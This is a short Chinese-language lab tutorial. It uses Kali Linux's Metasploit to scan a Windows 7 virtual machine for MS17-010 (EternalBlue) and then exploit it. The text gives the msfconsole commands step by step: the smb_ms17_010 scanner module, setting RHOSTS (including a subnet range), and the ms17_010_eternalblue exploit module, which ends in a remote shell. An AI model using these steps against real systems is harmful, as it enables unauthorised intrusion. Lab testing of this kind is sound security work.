使用metasploit 检测MS17-010及利用

    Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击（也通常用于回溯分析）。

    此次采用kali Linux系统集成的metasploit进行测试验证MS17-010（永恒之蓝，著名比特币勒索漏洞）。实验环境采用虚拟机，kali 测试机，windows 7 x64 测试靶机。

---

一、使用scanner下扫描模块扫描是否存在漏洞。

①启用msf之前需要启用postgres服务

②msfconsole //启用msf

③search smb_ms17_010  //使用search 查找ms17_010利用工具目录

④use auxiliary/scanner/smb/smb_ms17_010  //调用scanner smb_ms17_010模块进行扫描

并使用show options查看设置参数

⑥set RHOSTS 192.168.198.136  //设置扫描地址（可设置扫描段 eg: set RHOSTS 192.168.198.0/24）

设置好之后，使用show options查看配置信息，并使用exploit进行测试（利用测试，显示绿色的+，以及提示信息，即为存在漏洞主机）。

二、使用exploit下利用模块进行漏洞攻击。

①use exploit/windows/smb/ms17_010_eternalblue  //调用exploit下的ms17_010_eternalblue模块

使用show options查看参数设置

③set RHOST 192.168.198.136   //设置目标靶机

并使用exploit调用漏洞测试，成功拿到目标shell